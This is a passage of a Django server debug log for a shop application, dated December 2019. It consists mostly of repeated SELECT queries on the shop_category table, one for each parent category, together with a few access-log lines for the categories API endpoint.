SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:50:22,452 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:50:22,456 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:50:22,462 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:50:22,466 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:50:22,472 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:50:22,476 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:50:22,480 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:50:22,484 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:50:22,488 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:50:22,493 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:50:22,498 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:50:22,502 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:50:22,506 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:50:22,511 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:50:22,515 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:50:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [18/Dec/2019 13:52:23] "GET / HTTP/1.0" 302 0 [18/Dec/2019 13:57:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 13:57:30,627 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:57:30,638 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:57:30,644 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:57:30,648 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:57:30,655 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:57:30,659 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:57:30,663 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:57:30,667 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:57:30,671 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:57:30,678 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:57:30,682 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:57:30,685 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:57:30,689 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:57:30,693 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:57:30,699 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:57:30,703 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:57:30,707 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:57:30,711 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:57:30,715 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:57:30,721 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:57:30,725 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:57:30,729 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:57:30,733 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:57:30,737 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:57:30,741 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:57:30,746 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:57:30,750 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:57:30,755 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:57:30,759 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:57:30,763 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:57:30,769 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:57:30,773 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:57:30,777 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:57:30,781 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:57:30,785 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:57:30,791 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:57:30,795 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:57:30,799 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:57:30,803 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:57:30,807 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:57:30,810 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:57:30,815 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:57:30,819 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:57:30,823 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:57:30,829 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:57:30,833 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:57:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:58:22,468 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:58:22,475 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:58:22,483 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:58:22,485 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:58:22,489 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:58:22,491 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", 